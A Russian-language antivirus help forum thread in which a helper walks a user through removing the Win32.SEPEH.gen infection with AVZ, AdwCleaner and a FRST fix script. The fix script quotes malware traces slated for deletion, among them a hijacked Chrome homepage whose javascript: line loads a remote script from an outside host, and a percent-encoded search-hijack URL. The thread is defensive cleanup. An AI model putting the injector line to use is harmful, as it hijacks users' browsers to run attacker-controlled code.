Перейти к содержанию

Вирус Win32.SEPEH.gen


Александр Алексеев

Рекомендуемые сообщения

Александр Алексеев

Добрый день помогите удалить вирус Win32.SEPEH.gen. Антивирус обнаруживает его , вроде бы удаляет. Но после перезагрузки снова обнаруживает его.

 Лог файл прикрепляю.

CollectionLog-2019.02.26-13.20.zip

Ссылка на сообщение
Поделиться на другие сайты

Здравствуйте!

 

Следы бывшей установки Avast очистите по соотв. инструкции:

Чистка системы после некорректного удаления антивируса.

 

Через Панель управления - Удаление программ - удалите нежелательное ПО:

IObit Unlocker

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
 ExecuteRepair(1);
 ExecuteRepair(13);
RebootWindows(false);
end.
Компьютер перезагрузится.

 

Файл CheckBrowserLnk.log

из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

 

move.gif

 

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.

 

 

Затем:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве. Изменено пользователем Sandor
Ссылка на сообщение
Поделиться на другие сайты
Александр Алексеев

Спасибо за оперативную помощь. 

Всё выполнил по пунктам.

После сканирования  AdwCleanerКнопку Очистить и востановить не нажимал.

 

AdwCleanerS00.txt

ClearLNK-2019.02.26_14.39.45.log

Ссылка на сообщение
Поделиться на другие сайты

  • Запустите повторно AdwCleaner (by Malwarebytes) (программу необходимо запускать через правую кн. мыши от имени администратора).
  • В меню Настройки включите дополнительно в разделе Базовые действия:
    • Сбросить политики IE
    • Сбросить политики Chrome
  • В меню Панель управления нажмите Сканировать.
  • По окончании нажмите кнопку Очистить и восстановить и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты
Александр Алексеев

Ваши рекомендации выполнил.

Троян всё ещё на месте.

AdwCleanerC01.txt

post-53233-0-64833400-1551183207_thumb.png

Изменено пользователем Александр Алексеев
Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
    CreateRestorePoint:
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    GroupPolicy\User: Restriction ? <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    HKU\S-1-5-21-3771345801-508105297-1196020027-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErU7DQvze26qMhqdUweztPcF995dNXwCYzl8raBKKxPmIFMuLP4vHBZntUYrYVll8r2uFS805MYWgEHGgSi17R8rgx-E95FrGiC0pBW1vkC7pKSmSGfK5w_04lOvLpR8j75v3lydtHietS72IuUPtxWBtAu-MX6Q7vlwd1lVGI&q={searchTerms}
    CHR HomePage: Default -> javascript:var%20s=document.createElement('script');s.src='hxxp://vkontaktemp3.ru/myscripts/audio.js?nc='+Math.random();document.body.appendChild(s);void(0);
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\honmgldinfkdoibjgmofiioodbclaomc
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\honmgldinfkdoibjgmofiioodbclaomc
    C:\Users\User\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmeinlfojlcegblpogpjbhipmonclejh
    C:\Users\User\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi
    C:\Users\User\AppData\Roaming\Opera Software\Opera Stable\Extensions\gfbnpafjoipohaijdlpkkpbflklecdpi
    R1 F86D6063F32A; C:\Windows\F86D6063F32A.sys [621928 2019-01-28] (韵羽健康管理咨询(上海)有限公司 -> VideoDriver)
    2019-01-28 20:42 - 2019-01-28 20:42 - 000621928 _____ (VideoDriver) C:\Windows\F86D6063F32A.sys
    2019-02-26 14:14 - 2018-03-28 19:45 - 000000000 ____D C:\ProgramData\IObit
    2019-01-28 20:51 - 2019-01-28 20:51 - 000070896 _____ () C:\Users\User\AppData\Local\Config.xml
    2019-01-28 20:42 - 2019-01-28 20:42 - 000140800 _____ () C:\Users\User\AppData\Local\installer.dat
    2019-01-28 20:51 - 2019-01-28 20:51 - 000005568 _____ () C:\Users\User\AppData\Local\md.xml
    2019-01-28 20:42 - 2019-01-28 20:50 - 000722944 _____ () C:\Users\User\AppData\Local\sham.db
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    Task: {930814F8-210D-4962-8159-343C7422D1F7} - System32\Tasks\Avast Software\Overseer => C:\Program Files\AVAST Software\Avast\setup\overseer.exe
    AlternateDataStreams: C:\Users\Public\DRM:مايكروسوفت [48]
    HKU\S-1-5-21-3771345801-508105297-1196020027-1000\Software\Classes\.scr: scrfile =>  <==== ATTENTION
    FirewallRules: [TCP Query User{16F242A4-372E-4C8A-9DBD-049BA9D4D233}C:\users\user\desktop\propack\utorrent.exe] => (Allow) C:\users\user\desktop\propack\utorrent.exe No File
    FirewallRules: [UDP Query User{793CE41C-5C1C-4607-ABF7-4341CFC9D05D}C:\users\user\desktop\propack\utorrent.exe] => (Allow) C:\users\user\desktop\propack\utorrent.exe No File
    FirewallRules: [{A7E1AAFC-FBA3-481F-916D-F648B18E6DCE}] => (Allow) C:\Program Files\NetWorx\networx.exe No File
    FirewallRules: [{614E2EC8-28B2-4B9F-8464-624E449157A3}] => (Allow) C:\Program Files\NetWorx\networx.exe No File
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

Ссылка на сообщение
Поделиться на другие сайты
Александр Алексеев

Вроде,пока не проявляется.  Попробую просканировать компьютер заново. Я скорее всего завтра отпишусь, мне на работу нужно уходить скоро. 

Спасибо за оперативную и квалифицированную помощь))

Ссылка на сообщение
Поделиться на другие сайты

Завершающие шаги:

1.

  • Пожалуйста, запустите adwcleaner.exe
  • В меню Настройки - Удалить AdwCleaner - выберите Удалить.
  • Подтвердите удаление, нажав кнопку: Да.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.

Компьютер перезагрузится.

 

Остальные утилиты лечения и папки можно просто удалить.

 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
Ссылка на сообщение
Поделиться на другие сайты

Присоединяйтесь к обсуждению

Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.

Гость
Ответить в этой теме...

×   Вставлено с форматированием.   Вставить как обычный текст

  Разрешено использовать не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отображать как обычную ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставлять изображения напрямую. Загружайте или вставляйте изображения по ссылке.

×
×
  • Создать...